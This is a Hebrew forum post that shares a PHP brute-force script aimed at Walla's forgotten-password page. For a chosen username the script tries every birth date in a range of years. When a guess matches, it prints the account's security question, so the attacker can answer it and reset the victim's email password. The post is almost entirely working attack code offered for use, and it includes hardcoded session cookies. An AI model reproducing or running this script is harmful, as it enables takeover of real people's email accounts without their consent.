ברוט פורס פשוט לשכחתי סיסמה של וואלה,
מנחש תאריך לידה ומחזיר את השאלה שם תענו עליה תוכלו לשנות את הסיסמה למייל.
קוד PHP:
<html><head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<title>walla brute force BY Sh0RtCuT</title></head>
</head>
<?php
@set_time_limit(0);
if(isset($_GET['username']))
$val=$_GET['username'];
else
$val="";
if(isset($_GET['start']))
$val2=$_GET['start'];
else
$val2="1960";
if(isset($_GET['end']))
$val3=$_GET['end'];
else
$val3="2009";
?>
<body bgcolor="blue">
<center>
<font size="+2" color="black"><b><u><i><big>WaLLa BF BY Sh0RtCuT</font></u></i></b></big><br>
<a href=mailto:tshabi8@hotmail.com>tshabi8@hotmail.com</a>
<br><BR><BR><BR>
<form method="GET">
Username:<input type="text" name="username" size="20" value="<?php echo $val; ?>"/><br><br>
From (years): <input type="text" name="start" size="10" value="<?php echo $val2; ?>"/>
to (years): <input type="text" name="end" size="10" value="<?php echo $val3; ?>"/>
<input type="submit" value="attack"/>
</form>
<br /><br><BR><BR>
<?php
if(isset($_GET['username']))
{
$ya=$_GET['start'];
$yz=$_GET['end'];
$u=$_GET['username'];
$fou=false;
for($d=1;$d<=31;$d++)
{
for($m=1;$m<=12;$m++)
{
for($y=$ya;$y<=$yz;$y++)
{
$fp="";
if(!($fp = fsockopen('friends.walla.co.il', 80, $errno, $errstr, 5)))
{
echo 'Could not connect to USPS! Error number: ' . $errno . '(' . $errstr . ')';
$d--;
$m--;
$y--;
}
else
{
$salida="DD=".$d."&MM=".$m."&YYYY=".$y."&country_code=105&username=".$u."&ReturnURL=http%3A%2F%2Fmail.walla.co.il&w=%2F%40hint.commit";
$req="";
$host="friends.walla.co.il";
$referer="http://friends.walla.co.il/";
$cook="__utma=183361440.643461262568845000.1224624734.1226600335.1227202787.12; __utmz=183361440.1226560296.7.4.utmcsr=***.co.il|utmccn=(referral)|utmcmd=referral|utmcct=/showthread.php; adfWUP=20072; wamailcontent=news; myK=22E97BF702472KV5ZL75FUNURM9KLDAZ93JD9YKB7WY42KQEPIIDTUO7CLT3TMB3O36KORG6GPQ7Q; nick=>asd; tuid=24119834525602; __utmb=183361440.20.10.1227202787; __utmc=183361440; innerprime3=1; innerprime_vertical=1; K=22E97BF702472KV5ZL75FUNURM9KLDAZ93JD9YKB7WY42KQEPIIDTUO7CLT3TMB3O36KORG6GPQ7Q; up=20072; block=A55419B1A54737B1A55463B1A53609B1A54563B1A55446B1A54674B1; SENC=GHDLLLWIRNFJSOEKSASFGSA22";
$req.= "POST / HTTP/1.1\r\n";
$req.= "Host: ".$host."\r\n";
$req.= "User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; he; rv:1.9.0.4) Gecko/2008102920 Firefox/3.0.4\r\n";
$req.= "Accept-Language: he,en-US;q=0.7,en;q=0.3\r\n";
$req.= "Accept-Charset: windows-1255,utf-8;q=0.7,*;q=0.7\r\n";
$req.= "Connection: keep-alive\r\n";
$req.= "Content-Type: application/x-www-form-urlencoded\r\n";
$req.="Content-Length: ".strlen($salida)."\r\n\r\n";
$req.= $salida;
fwrite($fp, $req);
$res="";
while(!feof($fp))
$res.= fgets($fp, 512);
fclose($fp);
if(preg_match("/password/",$res))
{
$fou=true;
echo "FounD! <br>";
echo "Username: ".$u."<br>";
echo "Day: ".$d."<br>";
echo "Month: ".$m."<br>";
echo "Year: ".$y."<br><br>";
$aq=explode("</td><td rowspan=2> </td></tr>",$res);
$qa=explode(" info",$aq[0]);
$qq=explode("</td><td>",$qa[1]);
echo " The question:<br>";
echo $qq[1];
$d=31;
$y=$yz;
$m=12;
}
} // for($m=1;$m<=12;$m++)
} //for($y=$ya;$y<=$yz;$y++)
} //for($d=1;$d<=31;$d++)
if(!fou)
echo "Not found";
} //else
} //if(isset($_GET['username']))
?></body> </html>
*קרדיט לshortcut מאתר אחר.
BF לשחכתי סיסמה של וואלה.
ציטוט ההודעה
נכתב במקור על ידי Clonex
